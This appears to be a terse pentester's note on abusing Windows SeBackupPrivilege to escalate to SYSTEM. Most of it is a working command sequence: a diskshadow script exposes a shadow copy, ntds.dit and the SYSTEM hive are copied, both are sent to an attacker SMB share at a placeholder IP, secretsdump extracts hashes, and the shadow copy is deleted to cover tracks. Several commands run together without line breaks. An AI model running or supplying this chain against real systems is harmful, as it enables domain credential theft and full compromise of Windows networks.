If you've SeBackupPrivilege. We can use that privilege to read and get any file from the target machine. If we attack SAM, SYSTEM or ntds.dit some important files we can beacome SYSTEM.
First upload SeBackupPrivilegeCmdLets.dll and SeBackupPrivilegeUtils.dll to target machine.
import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dllset context persistent nowriters
set metadata c:\\programdata\\test.cab
set verbose on
add volume c: alias test
create
expose %test% z:NOTE: c:\programdata is the writeable path where you i have upload dll and creating a test.cab
unix2dos vss.dshupload the file on C:\programdata
diskshadow /s c:\\programdata\\vss.dshCopy any file to present dir and then download it to your system.
We gonna get ntds.dit and system.
Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit c:\\programdata\\ntds.ditNow system file
reg save HKLM\SYSTEM C:\\programdata\\SYSTEMNow we can see that both ntds.dit and SYSTEM files are in our present dir. You can also get other sensetive files like SAM, SYSTEM, SECURITY.
smbserver.py k4sth4 . -smb2support -username kt -password kt
net use \\10.10.x.x\k4sth4 /u:kt ktCopy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit \\10.10.x.x\k4sth4\ntds.dit
reg.exe save hklm\system \\10.10.x.x\systemsecretsdump.py -ntds ntds.dit -system SYSTEM LOCALrobocopy /b C:\\users\\administrator\\desktop C:\\programdata\\tempWe get all the desktop files in temp dir.
set context persistent nowriters
set metadata c:\\programdata\\test.cab
set verbose on
delete shadows volume test
resetunix2dos vss.dshdiskshadow /s c:\\programdata\\vss.dsh